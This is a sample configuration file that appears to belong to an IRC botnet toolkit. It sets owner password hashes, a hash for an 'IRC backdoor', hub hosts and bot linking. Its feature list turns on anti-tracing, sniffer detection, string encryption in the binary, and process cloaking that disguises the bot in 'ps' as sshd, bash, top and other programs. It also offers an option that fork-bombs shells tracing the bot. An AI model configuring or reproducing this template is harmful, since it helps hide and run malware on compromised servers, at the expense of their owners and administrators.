pack.cfg.sample 3.3 KB

1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192939495969798
  1. /* The < && > indicates the area you must change!
  2. * Do not leave the <>
  3. */
  4. /* PACKNAME: name of the pack */
  5. PACKNAME <name>
  6. /* HASHES
  7. * These must remain 100% secure/private, these keys can retrieve the salts, and
  8. * the entire botnet could be hijacked, a pass 8 chars or more is suggested
  9. */
  10. /* SHELLHASH: 32 char md5 hash used for binary password
  11. * in mIRC: //echo -a $md5(SOMEWORD)
  12. * URL: http://edge.codebin.dk/md5.php
  13. */
  14. SHELLHASH <md5hash>
  15. /* BDHASH: 32 char MD5 hash used for IRC backdoor
  16. # NOTE: Botlink uses this for linking, if it is changed on a bot, it wont link to another bot unless
  17. # the other bot has the same bdhash. (Protects your botnet, trust me) */
  18. BDHASH <md5hash>
  19. /* DCCPREFIX: 1 char cmd prefix for dcc. (ie, .cmd or !cmd) */
  20. DCCPREFIX <.>
  21. /* The settings below can each be defined multiple times */
  22. /* OWNER <nick password host>
  23. * Multiple OWNER lines may be defined, each will be added as a +a perm owner.
  24. * nick: nickname what else?
  25. * password: initial password for user
  26. * host: hosts of the user (list as many as needed)
  27. */
  28. OWNER <Bob S0m3P4ass *!bob@1.2.3.4 *!*@1.2.3.4>
  29. /* OWNEREMAIL: email addresses that status/errors will be sent to when needed
  30. * list as many as needed
  31. */
  32. OWNEREMAIL <some@email.com>
  33. /* HUB <nick host port ident>
  34. * Hubs are ranked by the order they are listed (previously was hublevel in settings.c)
  35. * nick: nick of hub
  36. * host: hostname or ip of hub (A 'dynamic' OR 'changeable' HOSTNAME IS RECOMMENDED)
  37. * port: port the hub listens on
  38. * ident: ident of the hub (list as many as needed)
  39. */
  40. HUB <God god.net 666 god ~God ~george>
  41. /* DEFINES
  42. * Simply use a '+' to enable a feature, be sure to include the space.
  43. * If this is the template pack.cfg, defines are set to their recommended values
  44. */
  45. + ANTITRACE This will quit the bot if tracing is detected
  46. + AUTHCMDS Enable a special list of cmds to be used after Authing.
  47. + AUTHHASH Require a script to AUTH (using hashes)
  48. + AUTOAWAY Random autoaway/return on IRC
  49. - AUTOLOCK Will lock channels upon certain conditions
  50. + CONFEDIT Crontab -e style config editor
  51. + DCCAUTH Require Auth hashing with scripts for dcc party line.
  52. + DCCPASS DCC command passwords
  53. + GARBLESTRINGS Encrypt strings in binary
  54. + HIJACKCHECK Checks for a common process hijacker method
  55. + LASTCHECK Checks every few seconds for logins with `last`
  56. - MESSUPTERM Fork bombs shells that trace the bot on startup
  57. + MSGCMDS Adds support for non-auth msg cmds, customizable throgh cmd_config
  58. - NAZIPASS Requires a 'special' char in passes..If you have AUTH enabled, this is unneeded
  59. + NODELAY Speeds up tcp sockets to server
  60. - PROCESSCHECK Checks running processes against a bad-list
  61. + PROMISC Checks for sniffers running on the server
  62. + PSCLOAK Cloaks the process for `ps` (can be disabled in botconfs)
  63. + RANDSERVERS Randomizes the server list per bot
  64. + SPLITHIJACK Cycle channels on split; CHANFIX/TS fixes
  65. + UTCTIME Uses GMT/UTC standard time instead of localtime
  66. /* PSCLOAK <name>
  67. * name: the name of the program to spoof as in 'ps'
  68. * list as many as needed
  69. * A default list is provided
  70. */
  71. PSCLOAK -bash
  72. PSCLOAK ftp
  73. PSCLOAK /usr/sbin/sshd
  74. PSCLOAK man
  75. PSCLOAK pine
  76. PSCLOAK bash
  77. PSCLOAK top
  78. PSCLOAK last
  79. PSCLOAK w
  80. PSCLOAK ps ux
  81. PSCLOAK bash
  82. PSCLOAK ./psybnc
  83. PSCLOAK BitchX
  84. /* SALTS: DO NOT TOUCH BELOW THIS LINE */